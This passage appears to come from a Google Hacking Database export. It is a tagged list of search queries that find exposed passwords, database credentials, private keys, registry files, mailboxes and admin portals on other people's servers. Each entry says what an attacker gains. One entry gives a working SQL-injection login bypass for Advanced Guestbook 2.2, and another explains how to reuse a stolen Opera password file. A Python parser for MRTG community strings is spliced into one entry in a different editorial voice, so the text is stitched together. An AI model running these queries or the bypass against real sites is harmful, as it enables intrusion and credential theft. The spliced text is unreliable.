It often has channel passwords and/or login passwords for NickServ.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aperform+filetype%3Aini&btnG=Search[url]] [[dork]inurl:perform filetype:ini[dork]] [end][201]] [[start][202] [[title]intitle:"index of" intext:globals.inc[[title]] [[descr]Contains plaintext user/pass for a MySQL database.[descr]] [[url]http://www.google.com/search?hl=nl&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index+of%22+intext%3Aglobals.inc&lr=[url]] [[dork]intitle:"index of" intext:globals.inc[dork]] [end][202]] [[start][203] [[title]filetype:pdf "Assessment Report" nessus[[title]] [[descr]These are reports from the Nessus Vulnerability Scanner. These reports contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to follow.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Apdf+%22Assessment+Report%22+nessus[url]] [[dork]filetype:pdf "Assessment Report" nessus[dork]] [end][203]] [[start][204] [[title]inurl:"smb.conf" intext:"workgroup" filetype:conf conf[[title]] [[descr]These are Samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22smb.conf%22+intext%3A%22workgroup%22+filetype%3Aconf+conf[url]] [[dork]inurl:"smb.conf" intext:"workgroup" filetype:conf conf[dork]] [end][204]] [[start][205] [[title]intitle:"Samba Web Administration Tool" intext:"Help Workgroup"[title]] [[descr]This search reveals wide-open Samba web administration servers. 
Attackers can change options on the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Samba+Web+Administration+Tool%22+intext%3A%22Help+Workgroup%22[url]] [[dork]intitle:"Samba Web Administration Tool" intext:"Help Workgroup"[dork]] [end][205]] [[start][206] [[title]filetype:properties inurl:db intext:password[[title]] [[descr]The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Aproperties+inurl%3Adb+intext%3Apassword[url]] [[dork]filetype:properties inurl:db intext:password[dork]] [end][206]] [[start][207] [[title]inurl:names.nsf?opendatabase[[title]] [[descr]A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Anames.nsf%3Fopendatabase[url]] [[dork]inurl:names.nsf?opendatabase[dork]] [end][207]] [[start][208] [[title]"index of" inurl:recycler[[title]] [[descr]This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22index+of%22+inurl%3Arecycler[url]] [[dork]"index of" inurl:recycler[dork]] [end][208]] [[start][209] [[title]filetype:conf inurl:firewall -intitle:cvs[[title]] [[descr]These are firewall configuration files. 
Although these are often examples or sample files, in many cases they can still be used for information gathering purposes.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Aconf+inurl%3Afirewall+-intitle%3Acvs[url]] [[dork]filetype:conf inurl:firewall -intitle:cvs[dork]] [end][209]] [[start][210] [[title]filetype:inc intext:mysql_connect[[title]] [[descr]INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=filetype%3Ainc+intext%3Amysql_connect[url]] [[dork]filetype:inc intext:mysql_connect[dork]] [end][210]] [[start][211] [[title]"HTTP_FROM=googlebot" googlebot.com "Server_Software="[title]] [[descr]These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22HTTP_FROM%3Dgooglebot%22++googlebot.com+%22Server_Software%3D%22[url]] [[dork]"HTTP_FROM=googlebot" googlebot.com "Server_Software="[dork]] [end][211]] [[start][212] [[title]"Request Details" "Control Tree" "Server Variables"[title]] [[descr]These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. 
Attackers can use this information to formulate a very advanced attack against these targets.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Request+Details%22+%22Control+Tree%22+%22Server+Variables%22[url]] [[dork]"Request Details" "Control Tree" "Server Variables"[dork]] [end][212]] [[start][213] [[title]filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"[title]] [[descr]These pages display Windows registry keys which reveal passwords and/or usernames.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+%2Bintext%3A%22defaultusername%22+%2Bintext%3A%22defaultpassword%22[url]] [[dork]filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"[dork]] [end][213]] [[start][214] [[title]inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"[title]] [[descr]These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Ametaframexp%2Fdefault%2Flogin.asp+%7C+intitle%3A%22Metaframe+XP+Login%22[url]] [[dork]inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"[dork]] [end][214]] [[start][215] [[title]inurl:/Citrix/Nfuse17/[[title]] [[descr]These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2FCitrix%2FNfuse17%2F+[url]] [[dork]inurl:/Citrix/Nfuse17/ [dork]] [end][215]] [[start][216] [[title]filetype:wab wab[[title]] [[descr]These are Microsoft Outlook mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information. 
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Awab+wab+[url]] [[dork]filetype:wab wab [dork]] [end][216]] [[start][217] [[title]filetype:reg reg HKEY_CURRENT_USER username[[title]] [[descr]This search finds registry files from the Windows operating system. Considered the "soul" of the system, these files, and snippets from these files, contain sensitive information, in this case usernames and/or passwords.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+HKEY_CURRENT_USER+username[url]] [[dork]filetype:reg reg HKEY_CURRENT_USER username[dork]] [end][217]] [[start][218] [[title]filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS[[title]] [[descr]This search reveals SSH host keys from the Windows Registry. These files contain information about where the user connects, including hostnames and port numbers, and show sensitive information such as the SSH host key in use by that client. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+HKEY_CURRENT_USER+SSHHOSTKEYS+[url]] [[dork]filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS [dork]] [end][218]] [[start][219] [[title]inurl:/tmp[[title]] [[descr]Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2Ftmp+[url]] [[dork]inurl:/tmp [dork]] [end][219]] [[start][220] [[title]filetype:mbx mbx intext:Subject[[title]] [[descr]These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. 
Either way, addresses and email text can be pulled from these files.[descr]] [[url]http://www.google.com/search?q=filetype:mbx+mbx+intext:Subject&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N[url]] [[dork]filetype:mbx mbx intext:Subject[dork]] [end][220]] [[start][221] [[title]intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."[title]] [[descr]This is the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the eMule program itself).[descr]] [[url]http://www.google.com/search?q=intitle:%22eMule+*%22+intitle:%22-+Web+Control+Panel%22+intext:%22Web+Control+Panel%22+%22Enter+your+password+here.%22&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."[dork]] [end][221]] [[start][222] [[title]inurl:"webadmin" filetype:nsf[[title]] [[descr]This is a standard login page for Domino Web Administration.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22webadmin%22+filetype%3Ansf[url]] [[dork]inurl:"webadmin" filetype:nsf[dork]] [end][222]] [[start][223] [[title]filetype:reg reg +intext:"internet account manager"[title]] [[descr]This Google search reveals user names, POP3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Areg+reg+%2Bintext%3A%22internet+account+manager[url]] [[dork]filetype:reg reg +intext:"internet account manager[dork]] [end][223]] [[start][224] [[title]filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"[title]] [[descr]These are Outlook Express email files which contain emails, with full headers. 
The information in these emails can be useful for information gathering about a target.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Aeml+eml+%2Bintext%3A%22Subject%22+%2Bintext%3A%22From%22+%2Bintext%3A%22To%22[url]] [[dork]filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"[dork]] [end][224]] [[start][225] [[title]inurl:vtund.conf intext:pass -cvs[[title]] [[descr]These are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site.
[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Avtund.conf+intext%3Apass+-cvs[url]] [[dork]inurl:vtund.conf intext:pass -cvs[dork]] [end][225]] [[start][228] [[title]intitle:guestbook "advanced guestbook 2.2 powered"[title]] [[descr]Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. Attacker
From there, hit "Admin" then do the following:

Leave username field blank.
For password, enter this exactly:
') OR ('a' = 'a

You are now in the Guestbook's Admin section.

http://www.securityfocus.com/bid/10209

[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=intitle%3Aguestbook+%22advanced+guestbook+2.2+powered%22[url]] [[dork]intitle:guestbook "advanced guestbook 2.2 powered"[dork]] [end][228]] [[start][229] [[title]intitle:"300 multiple choices"[title]] [[descr]This search shows sites that return the 300 error code, but also reveals a server tag at the bottom of the page that an attacker could use to profile a system.[descr]] [[url]http://www.google.com/search?q=intitle:%22300+multiple+choices%22+intext:server.at&hl=en&lr=&ie=UTF-8&start=90&sa=N[url]] [[dork]intitle:"300 multiple choices" intext:server.at[dork]] [end][229]] [[start][230] [[title]intitle:"index of" mysql.conf OR mysql_config[[title]] [[descr]This file contains the port number, version number and path info for the MySQL server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22index+of%22+mysql.conf+OR+mysql_config[url]] [[dork]intitle:"index of" mysql.conf OR mysql_config[dork]] [end][230]] [[start][231] [[title]filetype:lic lic intext:key[[title]] [[descr]License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Alic+lic+intext%3Akey&btnG=Search[url]] [[dork]filetype:lic lic intext:key[dork]] [end][231]] [[start][232] [[title]"please log in"[title]] [[descr]This is a simple search for a login page. 
Attackers view login pages as the "front door" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22please+log+in%22[url]] [[dork]"please log in"[dork]] [end][232]] [[start][235] [[title]intitle:"Dell Remote Access Controller"[title]] [[descr]This is the Dell Remote Access Controller that allows remote administration of a Dell server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Dell+Remote+Access+Controller%22[url]] [[dork]intitle:"Dell Remote Access Controller"[dork]] [end][235]] [[start][237] [[title]intitle:intranet inurl:intranet +intext:"human resources"[title]] [[descr]According to whatis.com: "An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet."

This search allows you to not only access a company's private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour.
[descr]] [[url]http://www.google.com/search?ie=utf-8&oe=utf-8&q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22human+resources%22[url]] [[dork]intitle:intranet inurl:intranet +intext:"human resources"[dork]] [end][237]] [[start][238] [[title]filetype:log cron.log[[title]] [[descr]Displays logs from cron, the *nix automation daemon. Can be used to determine backups, full and relative paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate.
An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to back up their log files, this cron log will give that away too. [descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype:log+cron.log&spell=1[url]] [[dork]filetype:log cron.log[dork]] [end][238]] [[start][239] [[title]filetype:log access.log -CVS[[title]] [[descr]These are HTTP server access logs which contain all sorts of information, ranging from usernames and passwords to trusted machines on the network to full paths on the server. Could be VERY useful in scoping out a potential target.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+access.log+-CVS&btnG=Google+Search[url]] [[dork]filetype:log access.log -CVS[dork]] [end][239]] [[start][240] [[title]filetype:blt blt +intext:screenname[[title]] [[descr]Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list. [descr]] [[url]http://www.google.com/search?&ie=utf-8&oe=utf-8&q=filetype%3Ablt+blt+%2Bintext%3Ascreenname[url]] [[dork]filetype:blt blt +intext:screenname[dork]] [end][240]] [[start][241] [[title]filetype:dat "password.dat"[title]] [[descr]This file contains plaintext usernames and passwords. Deadly information in the hands of an attacker.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Adat+%22password.dat%22[url]] [[dork]filetype:dat "password.dat"[dork]] [end][241]] [[start][242] [[title]intitle:intranet inurl:intranet +intext:"phone"[title]] [[descr]These pages are often private intranet pages which contain phone listings and email addresses. 
These pages can be used as a sort of online "dumpster dive".[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22phone%22[url]] [[dork]intitle:intranet inurl:intranet +intext:"phone"[dork]] [end][242]] [[start][243] [[title]filetype:conf slapd.conf[[title]] [[descr]slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff.
[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Aconf+slapd%2Econf[url]] [[dork]filetype:conf slapd.conf[dork]] [end][243]] [[start][244] [[title]inurl:php.ini filetype:ini[[title]] [[descr]The php.ini file contains all the configuration for how PHP is parsed on a server. It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information. Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory.

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphp.ini+filetype%3Aini[url]] [[dork]inurl:php.ini filetype:ini[dork]] [end][244]] [[start][245] [[title]inurl:domcfg.nsf[[title]] [[descr]This will return a listing of servers running Lotus Domino. These servers by default have very descriptive error messages which can be used to obtain path and OS information. In addition, adding "Login Form Mapping" to the search will allow you to see detailed information about a few of the servers that have this option enabled.[descr]] [[url]http://www.google.com/search?q=DOMCFG.NSF&hl=en&lr=&ie=UTF-8&start=0&sa=N[url]] [[dork]DOMCFG.NSF[dork]] [end][245]] [[start][246] [[title]filetype:pem intext:private[[title]] [[descr]This search will find private key files... Private key files are supposed to be, well... private.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Apem+pem+intext%3Aprivate[url]] [[dork]filetype:pem pem intext:private[dork]] [end][246]] [[start][247] [[title]"Mecury Version" "Infastructure Group"[title]] [[descr]Mercury is a centralized ground control program for research satellites. This query simply locates servers running this software. 
As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&safe=off&q=%22Mercury+Version%22+%22Infrastructure+Group%22&spell=1[url]] [[dork]"Mercury Version" "Infrastructure Group"[dork]] [end][247]] [[start][248] [[title]filetype:conf inurl:proftpd.conf -sample[[title]] [[descr]A standard FTP configuration file that provides far too many details about how the server is set up, including installation paths, location of logfiles, generic username and associated group, etc.[descr]] [[url]http://www.google.com/search?q=filetype%3Aconf+inurl%3Aproftpd.conf+-sample+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8[url]] [[dork]filetype:conf inurl:proftpd.conf -sample [dork]] [end][248]] [[start][249] [[title]+htpasswd +WS_FTP.LOG filetype:log[[title]] [[descr]WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute "+htpasswd" for "+FILENAME" and you may get several hits that you hadn't seen with the 'normal' search.

Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..

A different approach might be "allinurl: "some.host.com" WS_FTP.LOG filetype:log" which tells you more about who's uploading files to a specific site.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%2Bhtpasswd+%2BWS_FTP.LOG+filetyp[url]] [[dork]+htpasswd +WS_FTP.LOG filetyp[dork]] [end][249]] [[start][250] [[title]intitle:"Big Sister" +"OK Attention Trouble"[title]] [[descr]This search reveals internal network status information about services and hosts.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Big+Sister%22+%2B%22OK+Attention+Trouble%22&btnG=Search[url]] [[dork]intitle:"Big Sister" +"OK Attention Trouble"[dork]] [end][250]] [[start][251] [[title]inurl:"/cricket/grapher.cgi"[title]] [[descr]This search reveals information about internal networks, such as configuration, services, bandwidth.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22%2Fcricket%2Fgrapher.cgi%22&btnG=Search[url]] [[dork]inurl:"/cricket/grapher.cgi"[dork]] [end][251]] [[start][252] [[title]inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM[[title]] [[descr]This search reveals internal network info including architecture, hosts and services available.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22cacti%22+%2Binurl%3A%22graph_view.php%22+%2B%22Settings+Tree+View%22+-cvs+-RPM&btnG=Search[url]] [[dork]inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM[dork]] [end][252]] [[start][253] [[title]intitle:"System Statistics" +"System and Network Information Center"[title]] [[descr]This search reveals internal network information including network configuration, ping times, services, and host info.
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22System+Statistics%22+%2B%22System+and+Network+Information+Center%22&btnG=Search[url]] [[dork]intitle:"System Statistics" +"System and Network Information Center"[dork]] [end][253]] [[start][254] [[title]inurl:"wvdial.conf" intext:"password"[title]] [[descr]The wvdial.conf is used for dialup connections.
It contains phone numbers, usernames and passwords in cleartext.

[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][254]] [[start][255] [[title]filetype:inc dbconn[[title]] [[descr]This file contains the username and password the website uses to connect to the db. Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Ainc+dbconn[url]] [[dork]filetype:inc dbconn[dork]] [end][255]] [[start][256] [[title]inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample[[title]] [[descr]Slapd.conf is the configuration file for slapd, the open-source LDAP daemon. The key "credentials" contains passwords in cleartext.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22slapd.conf%22+intext%3A%22credentials%22+-manpage+-%22Manual+Page%22+-man%3A+-sample&btnG=Search[url]] [[dork]inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample[dork]] [end][256]] [[start][257] [[title]inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample[[title]] [[descr]Slapd.conf is the configuration file for slapd, the open-source LDAP daemon. You can view a cleartext or crypted password for the "rootdn".[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22slapd.conf%22+intext%3A%22rootpw%22++-manpage+-%22Manual+Page%22+-man%3A+-sample&btnG=Search[url]] [[dork]inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample[dork]] [end][257]] [[start][258] [[title]filetype:ini ws_ftp pwd[[title]] [[descr]The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the "index of" keyword or by searching directly for the PWD= value inside the configuration file.
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aini+%2Bws_ftp+%2Bpwd&btnG=Search[url]] [[dork]filetype:ini +ws_ftp +pwd[dork]] [end][258]] [[start][259] [[title]inurl:forward filetype:forward -cvs[[title]] [[descr]Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aforward+filetype%3Aforward+-cvs&btnG=Search[url]] [[dork]inurl:forward filetype:forward -cvs[dork]] [end][259]] [[start][260] [[title]"Invision Power Board Database Error"[title]] [[descr]These are SQL error messages, ranging from too many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3, available for download on the site.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Invision+Power+Board+Database+Error%22&btnG=Search[url]] [[dork]"Invision Power Board Database Error"[dork]] [end][260]] [[start][261] [[title]filetype:netrc password[[title]] [[descr]The .netrc file is used for automatic login to servers. The passwords are stored in cleartext.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Anetrc+password&btnG=Search[url]] [[dork]filetype:netrc password[dork]] [end][261]] [[start][263] [[title]signin filetype:url[[title]] [[descr]JavaScript for user validation is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=signin+filetype%3Aurl&btnG=Search[url]] [[dork]signin filetype:url[dork]] [end][263]] [[start][264] [[title]filetype:dat wand.dat[[title]] [[descr]The world-famous web browser Opera has the ability to save the password for you, and it calls the system "Magic Wand".
When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automatically for you.
What a joy ^^

Opera saves this file on your computer,
it is located (on winXP) here:
D:\Documents and Settings\Peefy\Programdata\Opera\Opera75\profile\wand.dat
for me of course, change it so it's suitable for you..
But, if you don't have a descrambler or whatever, the passwords aren't cleartext, but you have to put the wand file in the location specified above, then open Opera, click Tools -> Wand Passwords, then see the URLs saved, then go to these URLs and click the wand button.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Adat+wand.dat&btnG=Search[url]] [[dork]filetype:dat wand.dat[dork]] [end][264]] [[start][265] [[title]"Index Of /network" "last modified"[title]] [[descr]Many of these directories contain information about the network, though an attacker would need a considerable amount of patience to find it.[descr]] [[url]http://www.google.com/search?q=%22Index+Of+%2Fnetwork%22+%22last+modified[url]] [[dork]"Index Of /network" "last modified[dork]] [end][265]] [[start][267] [[title]intitle:"album permissions" "Users who can modify photos" "EVERYBODY"[title]] [[descr]Gallery (http://gallery.menalto.com) is software that allows users to create web albums and upload pictures to them.

In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not "everybody" has modify rights, an attacker can do a search for "users who can see the album" to retrieve valid usernames for the gallery. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22album+permissions%22+%22Users+who+can+modify+photos%22+%22EVERYBODY%22&btnG=Search[url]] [[dork]intitle:"album permissions" "Users who can modify photos" "EVERYBODY"[dork]] [end][267]] [[start][269] [[title]filetype:ldb admin[[title]] [[descr]According to filext.com, the ldb file is "A lock file is used to keep multi-user databases from being changed in the same place by two people at the same time resulting in data corruption." These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and download the database file.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aldb+admin&btnG=Google+Search[url]] [[dork]filetype:ldb admin[dork]] [end][269]] [[start][270] [[title]inurl:/eprise/[[title]] [[descr]SilkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires NT 4, Windows 2000 or Solaris and is used by high-profile corporations.

If an attacker cuts the URL after the eprise/ directory, he is presented with the admin logon screen.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Feprise%2F+&btnG=Search[url]] [[dork]inurl:/eprise/ [dork]] [end][270]] [[start][274] [[title]filetype:cfg mrtg "target[*]" -sample -cvs -example[[title]] [[descr]Mrtg.cfg is the configuration file for polling SNMP-enabled devices. The community string (often 'public') is found in the line starting with Target:

#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhost
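A Target line like the one above is easy to pick apart mechanically, which is what a defender auditing exposed web roots (or an attacker triaging search results) actually does. The following is an added example written for this edit, not MRTG's own code and not part of the original GHDB entry: it parses a constructed mrtg.cfg fragment (hosts, names and community strings are made up), reports every SNMP target together with its community string, flags the well-known defaults, still reports targets that are commented out with a leading '#' (a commented credential is just as readable), and separates backtick script targets, which carry no SNMP credential at all.

```python
import re

# Constructed mrtg.cfg fragment for this example; hosts, names and strings are made up.
SAMPLE_MRTG_CFG = """\
WorkDir: /var/www/html/mrtg
Target[router1]: 2:public@192.0.2.1:::::2
Target[router1_cpu]: 1.3.6.1.4.1.9.2.1.58.0&1.3.6.1.4.1.9.2.1.58.0:s3cr3tRO@192.0.2.1
#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhost
Target[diskfree]: `/usr/local/bin/diskcheck.sh /`
Target[wan_in]: -ifInOctets.3&ifOutOctets.3:private@203.0.113.9:161
MaxBytes[router1]: 1250000
"""

DEFAULT_COMMUNITIES = {"public", "private"}

# Target[name]: spec   (a leading '#' means the line is commented out, but still readable)
TARGET_RE = re.compile(r"^(?P<comment>#\s*)?Target\[(?P<name>[^\]]+)\]:\s*(?P<spec>.+?)\s*$")

# SNMP spec: [-]OID_in&OID_out:community@host[:port:timeout:retries:backoff:version]
SNMP_RE = re.compile(r"^-?(?P<oids>[^:`]+):(?P<community>[^@]*)@(?P<host>[^:\s]+)(?::(?P<extra>.*))?$")


def parse_targets(cfg_text):
    """Describe every Target line: SNMP targets (with their community) and script targets."""
    findings = []
    for lineno, line in enumerate(cfg_text.splitlines(), 1):
        m = TARGET_RE.match(line.strip())
        if not m:
            continue
        spec = m.group("spec")
        entry = {"line": lineno, "name": m.group("name"),
                 "commented": m.group("comment") is not None}
        if spec.startswith("`"):
            # External-script target: no SNMP credential, but it still reveals local tooling.
            entry.update(kind="script", command=spec.strip("`"))
        else:
            s = SNMP_RE.match(spec)
            if s is None:
                entry.update(kind="unknown", spec=spec)
            else:
                community = s.group("community")
                entry.update(kind="snmp", host=s.group("host"), community=community,
                             default_community=community in DEFAULT_COMMUNITIES)
        findings.append(entry)
    return findings


def exposed_communities(cfg_text):
    """Map each polled host to the set of community strings the file reveals for it."""
    out = {}
    for f in parse_targets(cfg_text):
        if f["kind"] == "snmp":
            out.setdefault(f["host"], set()).add(f["community"])
    return out


if __name__ == "__main__":
    for f in parse_targets(SAMPLE_MRTG_CFG):
        print(f)
    print(exposed_communities(SAMPLE_MRTG_CFG))
```

Run it over any mrtg.cfg you find reachable from the web; a non-default community string in the output is the one to rotate first, since it is typically shared across every device the same MRTG host polls.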

Remember not all targets are SNMP devices. Users can monitor CPU info for example. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acfg+mrtg+%22target%5B*%5D%22+-sample+-cvs+-example&btnG=Search[url]] [[dork]filetype:cfg mrtg "target[*]" -sample -cvs -example[dork]] [end][274]] [[start][275] [[title]inurl:search/admin.php[[title]] [[descr]phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site.

